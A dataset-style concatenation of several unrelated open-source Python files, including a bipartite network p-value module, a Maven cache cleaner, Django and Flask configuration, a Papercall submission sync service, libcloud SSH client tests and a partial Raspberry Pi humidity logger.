``.csv``. If ``binary == True``, it will be saved in binary NumPy
``.npy`` format and the suffix ``.npy`` will be appended
automatically. By default, the file is saved in binary format.
:param bip_set: select row-nodes (``True``) or column-nodes (``False``)
:type bip_set: bool
:param parallel: select whether the calculation of the p-values should
be run in parallel (``True``) or not (``False``)
:type parallel: bool
:param filename: name of the output file
:type filename: str
:param delim: delimiter between entries in the ``.csv``file, default is
``\\t``
:type delim: str
:param binary: if ``True``, the file will be saved in the binary
NumPy format ``.npy``, otherwise as ``.csv``
:type binary: bool
:param num_chunks: number of chunks of p-value calculations that are
performed sequentially
:type num_chunks: int
:raise ValueError: raise an error if the parameter ``bip_set`` is
neither ``True`` nor ``False``
"""
if (type(bip_set) == bool) and bip_set:
biad_mat = self.adj_matrix
bin_mat = self.bin_mat
elif (type(bip_set) == bool) and not bip_set:
biad_mat = np.transpose(self.adj_matrix)
bin_mat = np.transpose(self.bin_mat)
else:
errmsg = "'" + str(bip_set) + "' " + 'not supported.'
raise NameError(errmsg)
n = self.get_triup_dim(bip_set)
pval = np.ones(shape=(n, ), dtype='float') * (-0.1)
# handle layers of dimension 2 separately
if n == 1:
nlam = np.dot(bin_mat[0, :], bin_mat[1, :].T)
plam = biad_mat[0, :] * biad_mat[1, :]
pb = PoiBin(plam)
pval[0] = pb.pval(nlam)
else:
# if the dimension of the network is too large, split the
# calculations # of the p-values in ``m`` intervals to avoid memory
# allocation errors
if n > 100:
kk = self.split_range(n, m=num_chunks)
else:
kk = [0]
# calculate p-values for index intervals
for i in range(len(kk) - 1):
k1 = kk[i]
k2 = kk[i + 1]
nlam = self.get_lambda_motif_block(bin_mat, k1, k2)
plam = self.get_plambda_block(biad_mat, k1, k2)
pv = self.get_pvalues_q(plam, nlam, k1, k2)
pval[k1:k2] = pv
# last interval
k1 = kk[len(kk) - 1]
k2 = n - 1
nlam = self.get_lambda_motif_block(bin_mat, k1, k2)
plam = self.get_plambda_block(biad_mat, k1, k2)
# for the last entry we have to INCLUDE k2, thus k2 + 1
pv = self.get_pvalues_q(plam, nlam, k1, k2 + 1)
pval[k1:] = pv
# check that all p-values have been calculated
# assert np.all(pval >= 0) and np.all(pval <= 1)
if filename is None:
fname = 'p_values_' + str(bip_set)
if not binary:
fname += '.csv'
else:
fname = filename
# account for machine precision:
pval += np.finfo(np.float).eps
self.save_array(pval, filename=fname, delim=delim,
binary=binary)
def get_lambda_motif_block(self, mm, k1, k2):
"""Return a subset of :math:`\\Lambda`-motifs as observed in ``mm``.
Given the binary input matrix ``mm``, count the number of
:math:`\\Lambda`-motifs for all the node couples specified by the
interval :math:`\\left[k_1, k_2\\right[`.
.. note::
* The :math:`\\Lambda`-motifs are counted between the **row-nodes**
of the input matrix ``mm``.
* If :math:`k_2 \equiv \\binom{mm.shape[0]}{2}`, the interval
becomes :math:`\\left[k_1, k_2\\right]`.
:param mm: binary matrix
:type mm: numpy.array
:param k1: lower interval limit
:type k1: int
:param k2: upper interval limit
:type k2: int
:returns: array of observed :math:`\\Lambda`-motifs
:rtype: numpy.array
"""
ndim = mm.shape[0]
# if the upper limit is the largest possible index, i.e. corresponds to
# the node couple (ndim - 2, ndim - 1), where node indices start from 0,
# include the result
if k2 == (ndim * (ndim - 1) / 2 - 1):
flag = 1
else:
flag = 0
aux = np.ones(shape=(k2 - k1 + flag, )) * (-1) # -1 as a test
[i1, j1] = self.flat2triumat_idx(k1, ndim)
[i2, j2] = self.flat2triumat_idx(k2, ndim)
# if limits have the same row index
if i1 == i2:
aux[:k2 - k1] = np.dot(mm[i1, :], mm[j1:j2, :].T)
# if limits have different row indices
else:
k = 0
# get values for lower limit row
fi = np.dot(mm[i1, :], mm[j1:, :].T)
aux[:len(fi)] = fi
k += len(fi)
# get values for intermediate rows
for i in range(i1 + 1, i2):
mid = np.dot(mm[i, :], mm[i + 1:, :].T)
aux[k : k + len(mid)] = mid
k += len(mid)
# get values for upper limit row
if flag == 1:
aux[-1] = np.dot(mm[ndim - 2, :], mm[ndim - 1, :].T)
else:
la = np.dot(mm[i2, :], mm[i2 + 1 : j2, :].T)
aux[k:] = la
return aux
def get_plambda_block(self, biad_mat, k1, k2):
"""Return a subset of the :math:`\\Lambda` probability matrix.
Given the biadjacency matrix ``biad_mat`` with
:math:`\\mathbf{M}_{rc} = p_{rc}`, which describes the probabilities of
row-node ``r`` and column-node ``c`` being linked, the method returns
the matrix
:math:`P(\\Lambda)_{ij} = \\left(M_{i\\alpha_1} \\cdot M_{j\\alpha_1},
M_{i\\alpha_2} \\cdot M_{j\\alpha_2}, \\ldots\\right),`
for all the node couples in the interval
:math:`\\left[k_1, k_2\\right[`. :math:`(i, j)` are two **row-nodes**
of ``biad_mat`` and :math:`\\alpha_k` runs over the nodes in the
opposite layer.
.. note::
* The probabilities are calculated between the **row-nodes** of the
input matrix ``biad_mat``.
* If :math:`k_2 \equiv \\binom{biad\\_mat.shape[0]}{2}`, the
interval becomes :math:`\\left[k1, k2\\right]`.
:param biad_mat: biadjacency matrix
:type biad_mat: numpy.array
:param k1: lower interval limit
:type k1: int
:param k2: upper interval limit
:type k2: int
:returns: :math:`\\Lambda`-motif probability matrix
:rtype: numpy.array
"""
[ndim1, ndim2] = biad_mat.shape
# if the upper limit is the largest possible index, i.e. corresponds to
# the node couple (ndim - 2, ndim - 1), where node indices start from 0,
# include the result
if k2 == (ndim1 * (ndim1 - 1) / 2 - 1):
flag = 1
else:
flag = 0
paux = np.ones(shape=(k2 - k1 + flag, ndim2), dtype='float') * (-0.1)
[i1, j1] = self.flat2triumat_idx(k1, ndim1)
[i2, j2] = self.flat2triumat_idx(k2, ndim1)
# if limits have the same row index
if i1 == i2:
paux[:k2 - k1, :] = biad_mat[i1, ] * biad_mat[j1:j2, :]
# if limits have different indices
else:
k = 0
# get values for lower limit row
fi = biad_mat[i1, :] * biad_mat[j1:, :]
paux[:len(fi), :] = fi
k += len(fi)
# get values for intermediate rows
for i in range(i1 + 1, i2):
mid = biad_mat[i, :] * biad_mat[i + 1:, :]
paux[k : k + len(mid), :] = mid
k += len(mid)
# get values for upper limit row
if flag == 1:
paux[-1, :] = biad_mat[ndim1 - 2, :] * biad_mat[ndim1 - 1, :]
else:
la = biad_mat[i2, :] * biad_mat[i2 + 1:j2, :]
paux[k:, :] = la
return paux
def get_pvalues_q(self, plam_mat, nlam_mat, k1, k2, parallel=True):
"""Calculate the p-values of the observed :math:`\\Lambda`-motifs.
For each number of :math:`\\Lambda`-motifs in ``nlam_mat`` for the node
interval :math:`\\left[k1, k2\\right[`, construct the Poisson Binomial
distribution using the corresponding
probabilities in ``plam_mat`` and calculate the p-value.
:param plam_mat: array containing the list of probabilities for the
single observations of :math:`\\Lambda`-motifs
:type plam_mat: numpy.array (square matrix)
:param nlam_mat: array containing the observations of
:math:`\\Lambda`-motifs
:type nlam_mat: numpy.array (square matrix)
:param k1: lower interval limit
:type k1: int
:param k2: upper interval limit
:type k2: int
:param parallel: if ``True``, the calculation is executed in parallel;
if ``False``, only one process is started
:type parallel: bool
"""
n = len(nlam_mat)
# the array must be sharable to be accessible by all processes
shared_array_base = multiprocessing.Array(ctypes.c_double, n)
pval_mat = np.frombuffer(shared_array_base.get_obj())
# number of processes running in parallel has to be tested.
# good guess is multiprocessing.cpu_count() +- 1
if parallel:
num_procs = multiprocessing.cpu_count() - 1
elif not parallel:
num_procs = 1
else:
num_procs = 1
self.input_queue = multiprocessing.Queue()
self.output_queue = multiprocessing.Queue()
p_inqueue = multiprocessing.Process(target=self.add2inqueue,
args=(num_procs, plam_mat, nlam_mat,
k1, k2))
p_outqueue = multiprocessing.Process(target=self.outqueue2pval_mat,
args=(num_procs, pval_mat))
ps = [multiprocessing.Process(target=self.pval_process_worker,
args=()) for i in range(num_procs)]
# start queues
p_inqueue.start()
p_outqueue.start()
# start processes
for p in ps:
p.start() # each process has an id, p.pid
p_inqueue.join()
for p in ps:
p.join()
p_outqueue.join()
return pval_mat
def add2inqueue(self, nprocs, plam_mat, nlam_mat, k1, k2):
"""Add elements to the in-queue to calculate the p-values.
:param nprocs: number of processes running in parallel
:type nprocs: int
:param plam_mat: array containing the list of probabilities for the
single observations of :math:`\\Lambda`-motifs
:type plam_mat: numpy.array (square matrix)
:param nlam_mat: array containing the observations of
:math:`\\Lambda`-motifs
:type nlam_mat: numpy.array (square matrix)
:param k1: lower interval limit
:type k1: int
:param k2: upper interval limit
:type k2: int
"""
n = len(plam_mat)
# add tuples of matrix elements and indices to the input queue
for k in xrange(k1, k2):
self.input_queue.put((k - k1, plam_mat[k - k1, :],
nlam_mat[k - k1]))
# add as many poison pills "STOP" to the queue as there are workers
for i in xrange(nprocs):
self.input_queue.put("STOP")
def pval_process_worker(self):
"""Calculate p-values and add them to the out-queue."""
# take elements from the queue as long as the element is not "STOP"
for tupl in iter(self.input_queue.get, "STOP"):
pb = PoiBin(tupl[1])
pv = pb.pval(int(tupl[2]))
# add the result to the output queue
self.output_queue.put((tupl[0], pv))
# once all the elements in the input queue have been dealt with, add a
# "STOP" to the output queue
self.output_queue.put("STOP")
def outqueue2pval_mat(self, nprocs, pvalmat):
"""Put the results from the out-queue into the p-value array."""
# stop the work after having met nprocs times "STOP"
for work in xrange(nprocs):
for val in iter(self.output_queue.get, "STOP"):
k = val[0]
pvalmat[k] = val[1]
def get_triup_dim(self, bip_set):
"""Return the number of possible node couples in ``bip_set``.
:param bip_set: selects row-nodes (``True``) or column-nodes
(``False``)
:type bip_set: bool
:returns: return the number of node couple combinations corresponding
to the layer ``bip_set``
:rtype: int
:raise ValueError: raise an error if the parameter ``bip_set`` is
neither ``True`` nor ``False``
"""
if bip_set:
return self.triumat2flat_dim(self.num_rows)
elif not bip_set:
return self.triumat2flat_dim(self.num_columns)
else:
errmsg = "'" + str(bip_set) + "' " + 'not supported.'
raise NameError(errmsg)
def split_range(self, n, m=4):
"""Split the interval :math:`\\left[0,\ldots, n\\right]` in ``m`` parts.
:param n: upper limit of the range
:type n: int
:param m: number of part in which range should be split
:type n: int
:returns: delimiter indices for the ``m`` parts
:rtype: list
"""
return [i * n / m for i in range(m)]
# ------------------------------------------------------------------------------
# Auxiliary methods
# ------------------------------------------------------------------------------
@staticmethod
def triumat2flat_idx(i, j, n):
"""Convert an matrix index couple to a flattened array index.
Given a square matrix of dimension ``n`` and the index couple
``(i, j)`` *of the upper triangular part* of the matrix, return the
index which the matrix element would have in a flattened array.
.. note::
* :math:`i \\in [0, ..., n - 1]`
* :math:`j \\in [i + 1, ..., n - 1]`
* returned index :math:`\\in [0,\\, n (n - 1) / 2 - 1]`
:param i: row index
:type i: int
:param j: column index
:type j: int
:param n: dimension of the square matrix
:type n: int
:returns: flattened array index
:rtype: int
"""
return int((i + 1) * n - (i + 2) * (i + 1) / 2. - (n - (j + 1)) - 1)
@staticmethod
def triumat2flat_dim(n):
"""Return the size of the triangular part of a ``n x n`` matrix.
:param n: the dimension of the square matrix
:type n: int
:returns: number of elements in the upper triangular part of the matrix
(excluding the diagonal)
:rtype: int
"""
return n * (n - 1) / 2
@staticmethod
def flat2triumat_dim(k):
"""Return the dimension of the matrix hosting ``k`` triangular elements.
:param k: the number of elements in the upper triangular
part of the corresponding square matrix, excluding the diagonal
:type k: int
:returns: dimension of the corresponding square matrix
:rtype: int
"""
return int(0.5 + np.sqrt(0.25 + 2 * k))
@staticmethod
def flat2triumat_idx(k, n):
"""Convert an array index into the index couple of a triangular matrix.
``k`` is the index of an array of length :math:`\\binom{n}{2}{2}`,
which contains the elements of an upper triangular matrix of dimension
``n`` excluding the diagonal. The function returns the index couple
:math:`(i, j)` that corresponds to the entry ``k`` of the flat array.
.. note::
* :math:`k \\in \left[0,\\ldots, \\binom{n}{2} - 1\\right]`
* returned indices:
* :math:`i \\in [0,\\ldots, n - 1]`
* :math:`j \\in [i + 1,\\ldots, n - 1]`
:param k: flattened array index
:type k: int
:param n: dimension of the square matrix
:type n: int
:returns: matrix index tuple (row, column)
:rtype: tuple
"""
# row index of array index k in the the upper triangular part of the
# square matrix
r = n - 2 - int(0.5 * np.sqrt(-8 * k + 4 * n * (n - 1) - 7) - 0.5)
# column index of array index k in the the upper triangular part of the
# square matrix
c = k + 1 + r * (3 - 2 * n + r) / 2
return r, c
def save_biadjacency(self, filename, delim='\t', binary=False):
"""Save the biadjacendy matrix of the BiCM null model.
The matrix can either be saved as a binary NumPy ``.npy`` file or as a
human-readable ``.csv`` file.
.. note::
* The relative path has to be provided in the filename, e.g.
*../data/pvalue_matrix.csv*.
* If ``binary==True``, NumPy
automatically appends the format ending ``.npy`` to the file.
:param filename: name of the output file
:type filename: str
:param delim: delimiter between values in file
:type delim: str
:param binary: if ``True``, save as binary ``.npy``, otherwise as a
``.csv`` file
:type binary: bool
"""
self.save_array(self.adj_matrix, filename, delim, binary)
@staticmethod
def save_array(mat, filename, delim='\t', binary=False):
"""Save the array ``mat`` in the file ``filename``.
The array can either be saved as a binary NumPy ``.npy`` file or as a
human-readable ``.npy`` file.
.. note::
* The relative path has to be provided in the filename, e.g.
*../data/pvalue_matrix.csv*.
* If ``binary==True``, NumPy
automatically appends the format ending ``.npy`` to the file.
:param mat: array
:type mat: numpy.array
:param filename: name of the output file
:type filename: str
:param delim: delimiter between values in file
:type delim: str
:param binary: if ``True``, save as binary ``.npy``, otherwise as a
``.csv`` file
:type binary: bool
"""
if binary:
np.save(filename, mat)
else:
np.savetxt(filename, mat, delimiter=delim)
################################################################################
# Main
################################################################################
if __name__ == "__main__":
pass
| mit | 1,499,766,940,394,343,700 | 40.672962 | 80 | 0.568733 | false | 3.909269 | false | false | false |
gdsglgf/toolkit | Python/maven_cleaner.py | 1 | 2058 | import os
import sys
from threading import Thread
try:
from queue import Queue # python 3
from urllib.request import urlretrieve
except:
from Queue import Queue # python 2
from urllib import urlretrieve
home = os.path.expanduser("~")
maven_home = os.path.join(home, '.m2/repository')
print('MAVEN HOME: %s' %maven_home)
def listfiles(path, filter=None):
if os.path.isfile(path) or not os.path.isdir(path):
return []
files = [os.path.join(path, f) for f in os.listdir(path)]
if filter:
files = [f for f in files if filter(f)]
return files
def enqueue(dir_queue, files):
for f in files:
dir_queue.put(f)
def isEnd(files):
for f in files:
if os.path.isdir(f):
return False
return True
def check(path, files, rmdir=False):
if os.path.isfile(path):
return
if rmdir:
jars = listfiles(path, filter=lambda f: f.endswith('.jar'))
if len(jars) == 0:
print('-------------------%s' %path)
for f in files:
print(f)
os.remove(f)
os.rmdir(path)
else:
caches = listfiles(path, filter=lambda f: f.endswith('.lastUpdated'))
for f in caches:
print(f)
os.remove(f)
def clean(num_worker_threads=5, rmdir=False):
dir_queue = Queue()
files = listfiles(maven_home)
enqueue(dir_queue, files)
def worker():
while not dir_queue.empty():
path = dir_queue.get()
files = listfiles(path)
if isEnd(files):
check(path, files, rmdir)
else:
enqueue(dir_queue, files)
dir_queue.task_done()
for i in range(num_worker_threads): # start threads
worker_thread = Thread(target=worker)
worker_thread.daemon = True
worker_thread.start()
dir_queue.join() # block until all tasks are done
print
print('clean done...')
def download(url, path):
urlretrieve(url, path)
def test_listfiles():
print(listfiles('maven_cleaner.py'))
print(listfiles('.'))
print([f for f in os.listdir() if f.endswith('.txt')])
def test_main():
test_listfiles()
def main():
if len(sys.argv) == 2 and sys.argv[1] == 'T':
clean(rmdir=True)
else:
clean()
if __name__ == '__main__':
# test_main()
main() | mit | -4,245,451,182,434,786,000 | 21.139785 | 71 | 0.662293 | false | 2.784844 | false | false | false |
pycircle/blog_django | src/blog_cms/settings.py | 1 | 4314 | """
Django settings for blog_cms project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.utils.translation import ugettext_lazy as _
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(v4)3fy!x-u=%rrqdd_n$mo#pf-gx(!p_)f0^n(aez-r-&mfs@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'disqus',
'djangobower',
'django_gravatar',
'thumbnailfield',
'blog',
)
# Bower components definition
BOWER_INSTALLED_APPS = (
'uikit#2.24.3',
'jquery#2.2.0',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'blog_cms.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, os.path.dirname(__file__), "templates"),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages"
)
WSGI_APPLICATION = 'blog_cms.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGES = (
('en', _('English')),
('pl', _('Polish')),
)
LOCALE_PATHS = (
os.path.join(os.path.dirname(os.path.abspath(__file__)), 'locale'),
os.path.join(BASE_DIR, 'articles', 'locale'),
)
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
"djangobower.finders.BowerFinder" # Needed for django-bower
)
BOWER_COMPONENTS_ROOT = os.path.join(os.path.dirname(BASE_DIR), "components") # Path of bower components
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_root")
STATICFILES_DIRS = (
os.path.join(BASE_DIR, os.path.dirname(__file__), "static", "static_files"),
)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, os.path.dirname(__file__), "static", "media")
# Disqus settings
DISQUS_API_KEY = 'FOOBARFOOBARFOOBARFOOBARFOOBARF'
DISQUS_WEBSITE_SHORTNAME = 'foobar' | mit | 2,757,774,071,022,925,300 | 26.83871 | 104 | 0.688456 | false | 3.326137 | false | false | false |
pyconca/2017-web | pyconca2017/pycon_schedule/services.py | 1 | 3713 | import json
import requests
from django.conf import settings
from pyconca2017.pycon_schedule.models import Speaker, Presentation
class PapercallInterface(object):
BASE_URL = 'https://www.papercall.io/api/v1'
EVENT_URL = '/event'
SUBMISSIONS_LIST_URL = '/submissions'
SUBMISSION_GET_URL = '/submissions/{submission_id}'
SUBMISSION_RATINGS_URL = '/submissions/{submission_id}/ratings'
class SubmissionStates(object):
ACCEPTED = 'accepted'
SUBMITTED = 'submitted'
REJECTED = 'rejected'
WAITLIST = 'waitlist'
def __init__(self):
self.client = requests.Session()
self.client.headers.update({'Authorization': settings.PAPERCALL_TOKEN})
def get_submissions(self, state=SubmissionStates.ACCEPTED):
""" Iterator """
url = '{}{}'.format(self.BASE_URL, self.SUBMISSIONS_LIST_URL)
params = {
'per_page': 100,
'page': 0,
'order': 'created_at',
}
if state:
params['state'] = state
while True:
params['page'] += 1
response = self.client.get(url, params=params)
response_pagination = json.loads(response.headers.get('x-pagination'))
data = response.json()
for item in data:
yield item
if response_pagination['last_page']:
break
class PresentationService(object):
def __init__(self):
self.papercall = PapercallInterface()
def sync_proposals(self, update=False):
"""
Sync Papercall submissions with the database.
:param update: If True, all values will be updated from Papercall.
:return:
"""
for submission in self.papercall.get_submissions():
speaker_data = self._submission_to_speaker_data(submission)
talk_data = self._submission_to_presentation_data(submission)
speaker = self._sync_speaker(speaker_data, update=update)
talk_data['speaker'] = speaker
self._sync_presentation(talk_data, update=update)
def _submission_to_speaker_data(self, submission):
profile = submission['profile']
return {
'full_name': profile['name'],
'bio': profile['bio'],
'twitter_username': profile['twitter'],
'company_name': profile['company'],
'url': profile['url'],
'shirt_size': profile['shirt_size'],
'email': profile['email'],
'location': profile['location'],
}
def _sync_speaker(self, speaker_data, update=False):
if update:
speaker = Speaker.objects.update_or_create(email=speaker_data['email'], defaults=speaker_data)[0]
else:
speaker = Speaker.objects.get_or_create(email=speaker_data.pop('email'), defaults=speaker_data)[0]
return speaker
def _submission_to_presentation_data(self, submission):
talk = submission['talk']
return {
'papercall_id': submission['id'],
'title': talk['title'],
'description': talk['description'],
'notes': talk['notes'],
'abstract': talk['abstract'],
'audience_level': talk['audience_level'],
'presentation_format': talk['talk_format'],
}
def _sync_presentation(self, data, update=False):
if update:
presentation = Presentation.objects.update_or_create(papercall_id=data['papercall_id'], defaults=data)[0]
else:
presentation = Presentation.objects.get_or_create(papercall_id=data.pop('papercall_id'), defaults=data)[0]
return presentation
| mit | -8,678,908,933,507,373,000 | 31.008621 | 118 | 0.590358 | false | 4.084708 | false | false | false |
Jc2k/libcloud | libcloud/test/compute/test_ssh_client.py | 2 | 7148 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more§
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import with_statement
import sys
import unittest
from libcloud.compute.ssh import ParamikoSSHClient
from libcloud.compute.ssh import ShellOutSSHClient
from libcloud.compute.ssh import have_paramiko
from mock import patch, Mock
if not have_paramiko:
ParamikoSSHClient = None
class ParamikoSSHClientTests(unittest.TestCase):
@patch('paramiko.SSHClient', Mock)
def setUp(self):
"""
Creates the object patching the actual connection.
"""
conn_params = {'hostname': 'dummy.host.org',
'port': 8822,
'username': 'ubuntu',
'key': '~/.ssh/ubuntu_ssh',
'timeout': '600'}
self.ssh_cli = ParamikoSSHClient(**conn_params)
@patch('paramiko.SSHClient', Mock)
def test_create_with_password(self):
"""
Initialize object with password.
Just to have better coverage, initialize the object
with the 'password' value instead of the 'key'.
"""
conn_params = {'hostname': 'dummy.host.org',
'username': 'ubuntu',
'password': 'ubuntu'}
mock = ParamikoSSHClient(**conn_params)
mock.connect()
expected_conn = {'username': 'ubuntu',
'password': 'ubuntu',
'allow_agent': False,
'hostname': 'dummy.host.org',
'look_for_keys': False,
'port': 22}
mock.client.connect.assert_called_once_with(**expected_conn)
@patch('paramiko.SSHClient', Mock)
def test_create_without_credentials(self):
"""
Initialize object with no credentials.
Just to have better coverage, initialize the object
without 'password' neither 'key'.
"""
conn_params = {'hostname': 'dummy.host.org',
'username': 'ubuntu'}
mock = ParamikoSSHClient(**conn_params)
mock.connect()
expected_conn = {'username': 'ubuntu',
'hostname': 'dummy.host.org',
'allow_agent': True,
'look_for_keys': True,
'port': 22}
mock.client.connect.assert_called_once_with(**expected_conn)
def test_basic_usage_absolute_path(self):
"""
Basic execution.
"""
mock = self.ssh_cli
# script to execute
sd = "/root/random_script.sh"
# Connect behavior
mock.connect()
mock_cli = mock.client # The actual mocked object: SSHClient
expected_conn = {'username': 'ubuntu',
'key_filename': '~/.ssh/ubuntu_ssh',
'allow_agent': False,
'hostname': 'dummy.host.org',
'look_for_keys': False,
'timeout': '600',
'port': 8822}
mock_cli.connect.assert_called_once_with(**expected_conn)
mock.put(sd)
# Make assertions over 'put' method
mock_cli.open_sftp().chdir.assert_called_with('root')
mock_cli.open_sftp().file.assert_called_once_with('random_script.sh',
mode='w')
mock.run(sd)
# Make assertions over 'run' method
mock_cli.get_transport().open_session().exec_command \
.assert_called_once_with(sd)
mock.close()
def test_delete_script(self):
"""
Provide a basic test with 'delete' action.
"""
mock = self.ssh_cli
# script to execute
sd = '/root/random_script.sh'
mock.connect()
mock.delete(sd)
# Make assertions over the 'delete' method
mock.client.open_sftp().unlink.assert_called_with(sd)
mock.close()
if not ParamikoSSHClient:
class ParamikoSSHClientTests(unittest.TestCase):
pass
class ShellOutSSHClientTests(unittest.TestCase):
def test_password_auth_not_supported(self):
try:
ShellOutSSHClient(hostname='localhost', username='foo',
password='bar')
except ValueError:
e = sys.exc_info()[1]
msg = str(e)
self.assertTrue('ShellOutSSHClient only supports key auth' in msg)
else:
self.fail('Exception was not thrown')
def test_ssh_executable_not_available(self):
class MockChild(object):
returncode = 127
def communicate(*args, **kwargs):
pass
def mock_popen(*args, **kwargs):
return MockChild()
with patch('subprocess.Popen', mock_popen):
try:
ShellOutSSHClient(hostname='localhost', username='foo')
except ValueError:
e = sys.exc_info()[1]
msg = str(e)
self.assertTrue('ssh client is not available' in msg)
else:
self.fail('Exception was not thrown')
def test_connect_success(self):
client = ShellOutSSHClient(hostname='localhost', username='root')
self.assertTrue(client.connect())
def test_close_success(self):
client = ShellOutSSHClient(hostname='localhost', username='root')
self.assertTrue(client.close())
def test_get_base_ssh_command(self):
client1 = ShellOutSSHClient(hostname='localhost', username='root')
client2 = ShellOutSSHClient(hostname='localhost', username='root',
key='/home/my.key')
client3 = ShellOutSSHClient(hostname='localhost', username='root',
key='/home/my.key', timeout=5)
cmd1 = client1._get_base_ssh_command()
cmd2 = client2._get_base_ssh_command()
cmd3 = client3._get_base_ssh_command()
self.assertEquals(cmd1, ['ssh', 'root@localhost'])
self.assertEquals(cmd2, ['ssh', '-i', '/home/my.key',
'root@localhost'])
self.assertEquals(cmd3, ['ssh', '-i', '/home/my.key',
'-oConnectTimeout=5', 'root@localhost'])
if __name__ == '__main__':
sys.exit(unittest.main())
| apache-2.0 | -8,181,954,370,134,637,000 | 34.381188 | 78 | 0.564433 | false | 4.363248 | true | false | false |
jlgoldman/writetogov | app/app_config.py | 1 | 1372 | import logging
import sys
from config import constants
from database import db
from util import sendgrid_
class AppConfig(object):
SECRET_KEY = constants.FLASK_SECRET_KEY
CSRF_ENABLED = True
SQLALCHEMY_DATABASE_URI = constants.SQLALCHEMY_DATABASE_URI
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_ECHO = False
def init_app(app):
db.init_app(app)
def init_prod_app(app):
app.config.from_object(__name__ + '.AppConfig')
init_app(app)
if not constants.DEBUG:
setup_log_handlers(app)
return app
def setup_log_handlers(app):
log_level = logging.WARNING
log_formatter = logging.Formatter(
'%(asctime)s %(levelname)s [in %(pathname)s:%(lineno)d]: %(message)s')
log_handlers = [
logging.StreamHandler(sys.stdout) if constants.LOG_TO_STDOUT else logging.FileHandler(constants.APP_LOG_FILENAME),
new_smtp_log_handler(),
]
app.logger.setLevel(log_level)
for log_handler in log_handlers:
log_handler.setLevel(log_level)
log_handler.setFormatter(log_formatter)
app.logger.addHandler(log_handler)
return app
def new_smtp_log_handler():
return sendgrid_.SendgridEmailLogHandler(
None, # No server needed, we're using sendgrid instead of SMTP
None,
constants.MONITORING_NOTIFICATION_EMAILS,
'WriteToGov Error')
| bsd-3-clause | 8,961,461,953,709,691,000 | 28.191489 | 122 | 0.685131 | false | 3.517949 | false | false | false |
86reddawg/PiDataRecorder | pidatarecorder.py | 1 | 2519 | #!/usr/bin/python
'''
Temp/Humidity Monitor - written by Joshua Hughes, 10/20/14
Must be run as root.
Records temperature and percent humidity from Adafruit DHT11/22 or AM2302 sensors once per minute
Calculates absolute humidity and dumps data into a database
Create an sqlite3 database and setup table with something like:
create table data(temp INTEGER, relhum INTEGER, abshum INTEGER, stamp DATETIME default CURRENT_TIMESTAMP);
'''
import time, datetime, sys, logging, Adafruit_DHT, math
import sqlite3 as sql
#Type of Adafruit sensor:
#DHT11 = 11
#DHT22 = 22
#AM2302 = 22
sensor = 22
pin = 18
db = '/home/pi/recorder.db'
log = '/var/log/temp.log'
#Math Constants for Humidity conversion
c1 = -7.85951783
c2 = 1.84408259
c3 = -11.7866497
c4 = 22.6807411
c5 = -15.9618719
c6 = 1.80122502
c7 = 2.16679
Tc = 647.096 # Critical Temp, K
Pc = 22064000 # Critical Pressure, Pa
#Calculate measured/saturation temp ratio
def v(T, p):
return math.pow(1 - (273.15 + T) / Tc, p)
#Calculate Water Vapor Saturation Pressure, Pws
def Pws(T):
return Pc * math.exp( Tc * (c1*v(T,1) + c2*v(T,1.5) + c3*v(T,3) + c4*v(T,3.5) + c5*v(T,4) + c6*v(T,7.5)) / (273.15+T) )
#Calculate Water Vapor Pressure, Pw
def Pw(T,RH):
